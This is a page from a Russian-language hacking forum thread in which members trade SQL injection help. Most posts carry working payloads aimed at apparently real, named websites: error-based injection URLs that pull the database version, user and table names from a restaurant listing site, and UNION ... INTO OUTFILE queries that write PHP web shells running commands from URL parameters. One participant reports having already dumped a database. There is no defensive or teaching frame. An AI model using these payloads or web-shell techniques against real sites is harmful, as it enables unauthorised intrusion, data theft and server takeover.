Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 808 of 1207
  1. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5

    select '<?php system($_GET[cmd]); ?> into outfile '(найди путь к папки где стоит права 777)'
     
    #16141 rootmd, 20 Feb 2011
  2. /Montana

    /Montana Elder - Старейшина

    Joined:
    26 Oct 2007
    Messages:
    133
    Likes Received:
    18
    Reputations:
    -1
    Можешь поподробнее описать, как проверить привелегии и как правильно составить запрос.

    Дира где находиться сайт /home/.sites/site1/
     
    #16142 /Montana, 20 Feb 2011
  3. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    раскажите про xpatch injection?
     
    #16143 boortyhuhtyu, 20 Feb 2011
  4. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    клац
     
    #16144 -=Razor=-, 20 Feb 2011
  5. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите определить версию БД.


    http://www.menupix.com/losangeles/restaurants.php?id=-204431+%6f%72%64%65%72+by+3+--+
     
    #16145 FlaktW, 20 Feb 2011
  6. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.menupix.com/losangeles/restaurants.php?id=1+and+%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
     
    #16146 Seravin, 20 Feb 2011
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как вывести имя юзера?
     
    #16147 FlaktW, 20 Feb 2011
  8. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Code:
    http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat(user(),floor(rand(0)*%202))having+min(0)+or+1
     
    #16148 Фараон, 20 Feb 2011
    1 person likes this.
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Каким запросом можно вывести название таблиц?


    http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat((SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1)),floor(rand(0)*%202))having+min(0)+or+1
     
    #16149 FlaktW, 20 Feb 2011
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat((select+table_name+from+information_schema.`tables`+limit+1),floor(rand(0)*2))having+min(0)+or+1
     
    _________________________
    #16150 Konqi, 20 Feb 2011
    1 person likes this.
  11. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Ребят вытянул дб, сделал экспорт на локалхост, в таблицах есть строки, как сделать сортировку, чтобы повторных значений не было? например строка id_user ...
     
    #16151 Lijzer, 20 Feb 2011
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    select distinct id_user from....
     
    _________________________
    #16152 Konqi, 20 Feb 2011
  13. Vollkorn

    Vollkorn Member

    Joined:
    6 Nov 2010
    Messages:
    86
    Likes Received:
    15
    Reputations:
    -6
    Тебе ж уже вроде написали.
    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php' --
    А вообще читай http://forum.antichat.ru/thread43966.html
     
    #16153 Vollkorn, 20 Feb 2011
  14. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Этот метод работает не везде.
    https://forum.antichat.net/thread98525.html
     
    #16154 h00lyshit!, 20 Feb 2011
  15. Slay90

    Slay90 Member

    Joined:
    12 Apr 2009
    Messages:
    146
    Likes Received:
    16
    Reputations:
    -5
    ребят такой вопрос, вообщем на одном сайте нашёл скуль инж (_http://www.bittu.org.ru//comtech/?q=node/21), формируется в методом POST если в если в поле логин ввести ковычку, выводит warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/aptech/includes/common.inc(1547) : eval()'d code on line 42.
    я не очень понимаю в инъекциях, точнее нихрена я не понимаю, помогите плз! каким образом мне вообще формировать запросы к БД, авторизациями?

    P.S если есть какой нибудь добрый дядька кто проконсультирует в этом вопросе, милости прошу icq 3300890.
     
    #16155 Slay90, 21 Feb 2011
  16. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    подобрал число колонок на PostgreSQL (PostgreSQL 8.1.11 on i686-pc-linux-gnu)

    1+union+select+null,null,null,null,null,null,null,null,null,null,null+--+

    сделал

    1+union+select+table_name,table_name,table_name,table_name,table_name,table_name,table_name,table_name,table_name,table_name,table_name+from+information_schema.tables+--+

    пишет

    Query failed: ERROR: UNION types integer and character varying cannot be matched in

    Как обойти?
     
    #16156 noviyuser, 21 Feb 2011
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ты сначала вывод определи в какой колонке идет..потом уже запрос делай, и еще все зависит от версии постгре...в новых есть INFORMATION_SCHEMA.TABLES а в старых пользуйся PG_TABLES
     
    #16157 Gorev, 21 Feb 2011
    Last edited: 21 Feb 2011
    1 person likes this.
  18. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Это несовпадение типов данных, вывод напрашивается сам по себе.
     
    #16158 h00lyshit!, 21 Feb 2011
    Last edited: 21 Feb 2011
    3 people like this.
  19. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    в том то и проблема что не могу определить какое поле выводится, если null,null,null то все нормально а если числовое значение делаю т.е. 1,2,3 и т.д. ошибку выводит

    cast(table_name+as+int) тоже не канает
     
    #16159 noviyuser, 21 Feb 2011
    Last edited: 21 Feb 2011
  20. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Тип колонки вам придется подбирать вручную типа
    Code:
    select field1::int, field2::text from ...
    и искать текстовое поле для вывода.
    ЗЫ. Со статьей https://forum.antichat.ru/thread35599.html ознакомились?
     
    #16160 krypt3r, 21 Feb 2011
    Last edited: 21 Feb 2011
(You must log in or sign up to post here.)
Page 808 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.